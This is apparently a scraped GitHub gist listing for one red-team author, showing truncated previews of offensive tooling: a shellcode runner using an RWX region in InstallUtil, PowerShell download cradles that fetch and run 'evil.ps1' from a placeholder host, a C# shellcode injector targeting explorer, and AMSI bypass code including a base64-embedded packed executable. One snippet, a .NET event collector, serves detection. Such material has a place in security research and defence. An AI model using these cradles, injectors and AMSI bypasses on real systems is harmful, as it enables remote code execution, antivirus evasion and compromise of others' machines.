TheWover
/ rwxHunter.cs
Created
November 2, 2018 20:50
— forked from nicholasmckinney/rwxHunter.cs
Locate a RWX Region in memory in InstallUtil.exe - Copy Shellcode Into It and Execute. Avoid VirtuallAlloc Call
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |
TheWover
/ DownloadCradles.ps1
Created
November 2, 2018 21:03
— forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |
TheWover
/ ShellcodeTest.cs
Created
January 16, 2019 16:01
Dirty but working C# remote shell code injector. Injects into explorer using the architecture of the platform. Modified from several random sources and cleaned up a bit.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* Author: TheWover | |
| Description: Injects embedded base64-encoded shellcode into an arbitrary hardcoded process using native Windows 32 API calls. | |
| Last Modified: 11/1/2018 | |
| */ | |
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| namespace ShellcodeTest |
TheWover
/ ShellcodeTest.cs
Created
January 16, 2019 16:01
Dirty but working C# remote shell code injector. Injects into explorer using the architecture of the platform. Modified from several random sources and cleaned up a bit.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* Author: TheWover | |
| Description: Injects embedded base64-encoded shellcode into an arbitrary hardcoded process using native Windows 32 API calls. | |
| Last Modified: 11/1/2018 | |
| */ | |
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| namespace ShellcodeTest |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // dllmain.cpp : Defines the entry point for the DLL application. | |
| #include "stdafx.h" | |
| #include <string> | |
| std::string test = "not Loaded"; | |
| BOOL APIENTRY DllMain( HMODULE hModule, | |
| DWORD ul_reason_for_call, | |
| LPVOID lpReserved | |
| ) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // TestLoad.cpp : This file contains the 'main' function. Program execution begins and ends there. | |
| // | |
| #include "pch.h" | |
| #include <iostream> | |
| #include <windows.h> | |
| typedef bool(*testFunction)(); |
TheWover
/ AMSIBypass2.cs
Last active
February 1, 2019 18:51
Copy of AMSIBypass2 from cyberark: https://www.cyberark.com/threat-research-blog/amsi-bypass-redux/.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| public static string run() | |
| { | |
| IntPtr dllHandle = LoadLibrary("amsi.dll"); //load the amsi.dll | |
| if (dllHandle == null) return "error"; | |
| //Get the AmsiScanBuffer function address | |
| IntPtr AmsiScanbufferAddr = GetProcAddress(dllHandle, "AmsiScanBuffer"); | |
| if (AmsiScanbufferAddr == null) return "error"; | |
TheWover
/ AMSIBypass2.ps1
Last active
June 3, 2020 20:39
Runs AMSIBypass2 to disable AMSI. Loads my packer DLL from b64, uses Reflection to call its Unpack function on packed AMSIBypass2.exe, then loads the result using Assembly.Load again. Powershell PoC of https://www.cyberark.com/threat-research-blog/amsi-bypass-redux/
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $payload = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAP7dKbEAAAAAAAAAAOAAIiALATAAAA4AAAAGAAAAAAAA2i0AAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAIctAABPAAAAAEAAAKgDAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAADILAAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAA4A0AAAAgAAAADgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAKgDAAAAQAAAAAQAAAAQAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAFAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAC7LQAAAAAAAEgAAAACAAUAVCMAAHQJAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABswBADaAAAAAQAAEQJzDwAACgpzEAAACgsHF3MRAAAKDAYIbxIAAAoIbxMAAApzFAAACg0JCW8VAAAKCW8WAAAKbxcAAAoTBHMQAAAKEwURBREEF3MYAAAKEwYRBgdvGQAAChYHbxkAAAqOaW8aAAAKEQZvGwAAChEFbxkAAAooHAAACglvFQAACigcAAAKCW8WAAAKKBwAAApzAwAABhMH3kARBiwH |
TheWover
/ PowershellRunspace.cs
Created
January 22, 2019 21:49
Runs PowerShell from C# through System.Management.Automation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Management.Automation; | |
| using System.Collections.ObjectModel; | |
| static void Main(string[] args) | |
| { | |
| //Using this class: https://docs.microsoft.com/en-us/dotnet/api/system.management.automation.powershell?view=powershellsdk-1.1.0 | |
| using (PowerShell PowerShellInstance = PowerShell.Create()) | |
| { |
TheWover
/ CollectDotNetEvents.ps1
Created
January 24, 2019 01:35
— forked from mattifestation/CollectDotNetEvents.ps1
A PoC script to capture relevant .NET runtime artifacts for the purposes of potential detections
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| logman --% start dotNetTrace -p Microsoft-Windows-DotNETRuntime (JitKeyword,NGenKeyword,InteropKeyword,LoaderKeyword) win:Informational -o dotNetTrace.etl -ets | |
| # Do your evil .NET thing now. In this example, I executed the Microsoft.Workflow.Compiler.exe bypass | |
| # logman stop dotNetTrace -ets | |
| # This is the process ID of the process I want to capture. In this case, Microsoft.Workflow.Compiler.exe | |
| # I got the process ID by running a procmon trace | |
| $TargetProcessId = 8256 |
OlderNewer